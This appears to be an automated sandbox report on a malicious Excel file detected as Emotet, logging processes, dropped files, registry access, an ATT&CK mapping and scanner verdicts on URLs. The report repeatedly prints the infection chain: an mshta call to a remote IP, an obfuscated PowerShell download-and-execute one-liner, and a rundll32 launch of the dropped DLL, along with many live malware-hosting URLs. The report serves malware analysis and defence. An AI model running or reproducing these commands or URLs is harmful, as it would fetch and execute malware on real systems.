Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD0E5.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@9/8@2/3

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Source: imedpub_8.xls	OLE indicator, Workbook stream: true
Source: imedpub_8.xls.0.dr	OLE indicator, Workbook stream: true

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: wC:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: >ystem.pdb source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbgement.Automation.pdbBBK source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbE source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: anagsymbols\dll\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: `C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.pdbSystem.pdbpdbtem.pdbm\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp

Source: 32B4.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Source: C:\Windows\System32\mshta.exe

Code function: 4_3_035B30CB push 8B490286h; iretd

Source: JooSee.dll.6.dr

Static PE information: real checksum: 0x8df98 should be: 0x935bd

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\JooSee.dll

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\JooSee.dll

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\mshta.exe TID: 1164

Thread sleep time: -300000s >= -30000s

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Dropped PE file which has not been started: C:\ProgramData\JooSee.dll

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Source: powershell.exe, 00000006.00000002.661397163.00000000000F5000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X

Source: Yara match	File source: imedpub_8.xls, type: SAMPLE
Source: Yara match	File source: C:\Users\user\Desktop\imedpub_8.xls, type: DROPPED

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq

Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation

Stealing of Sensitive Information

Yara detected Emotet

Source: Yara match

File source: C:\ProgramData\JooSee.dll, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	11 Command and Scripting Interpreter	Path Interception	11 Process Injection	1 Disable or Modify Tools	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	12 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	21 Scripting	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Clipboard Data	Exfiltration Over Bluetooth	2 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	13 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	22 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 PowerShell	Logon Script (Mac)	Logon Script (Mac)	21 Scripting	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
imedpub_8.xls	17%	ReversingLabs	Document-Excel.Trojan.Emotet

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\JooSee.dll	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://maxtdeveloper.com/okw9yx/	100%	Avira URL Cloud	malware
http://gardeningfilm.com/wp-content/pcMVUYDQ3q/	100%	Avira URL Cloud	malware
http://it-o.biz/bitrix/xoDdDe/PE3	100%	Avira URL Cloud	malware
http://www.inablr.com/elenctic/f	100%	Avira URL Cloud	malware
http://totalplaytuxtla.com/sitio/DgktL3zd/PE3	100%	Avira URL Cloud	malware
http://hostfeeling.com/wp-admin/	100%	Avira URL Cloud	malware
http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3	100%	Avira URL Cloud	malware
https://property-eg.com/mlzkir/97v/	100%	Avira URL Cloud	malware
http://91.240.11	0%	URL Reputation	safe
http://91.240.118.172/gg/ff/fe.png	100%	Avira URL Cloud	malware
http://91.240.118.172/gg/ff/fe.pngPE3	0%	Avira URL Cloud	safe
http://jurnalpjf.lan.go.id/asset	0%	Avira URL Cloud	safe
http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3	100%	Avira URL Cloud	malware
http://bimesarayenovin.ir/wp-adm	100%	Avira URL Cloud	malware
http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/	100%	Avira URL Cloud	malware
http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html	0%	Avira URL Cloud	safe
http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/	100%	Avira URL Cloud	malware
http://hostfeeling.com	100%	Avira URL Cloud	malware
http://daisy.sukoburu-secure.com	100%	Avira URL Cloud	malware
http://it-o.biz/	0%	Avira URL Cloud	safe
http://91.240.118.172/gg/ff/fe.htmlr	0%	Avira URL Cloud	safe
http://jurnalpjf.lan.go.id/assets/iM/	100%	Avira URL Cloud	malware
http://activetraining.sytes.net/	100%	Avira URL Cloud	malware
http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3	100%	Avira URL Cloud	malware
https://gudangtasorichina.com/wp-content/GG01c/PE3	100%	Avira URL Cloud	malware
https://gudangtasorichina.com/wp	0%	Avira URL Cloud	safe
http://daisy.suk	0%	Avira URL Cloud	safe
http://91.240.118.172/gg/ff/fe.htmlngs	0%	Avira URL Cloud	safe
http://91.240.118.172/gg/ff/fe.htmlmshta	0%	Avira URL Cloud	safe
http://91.240.118.172/gg/ff/fe.htmlWinSta0	0%	Avira URL Cloud	safe
http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3	100%	Avira URL Cloud	malware
https://property-eg.com/mlzkir/97v/PE3	100%	Avira URL Cloud	malware
http://daisy.sukoburu-secure.com/8plks/v8lyZTe/	100%	Avira URL Cloud	malware
https://property-eg.com/mlzkir/9	100%	Avira URL Cloud	malware
http://91.240.118.172	0%	Avira URL Cloud	safe
http://jurnalpjf.lan.go.id	0%	Avira URL Cloud	safe
http://www.protware.com	0%	URL Reputation	safe
http://activetraining.sytes.net/libraries/8s/PE3	100%	Avira URL Cloud	malware
http://91.240.118.172/gg/ff/fe.htmlfunction	0%	Avira URL Cloud	safe
http://totalplaytuxtla.com/sitio	0%	Avira URL Cloud	safe
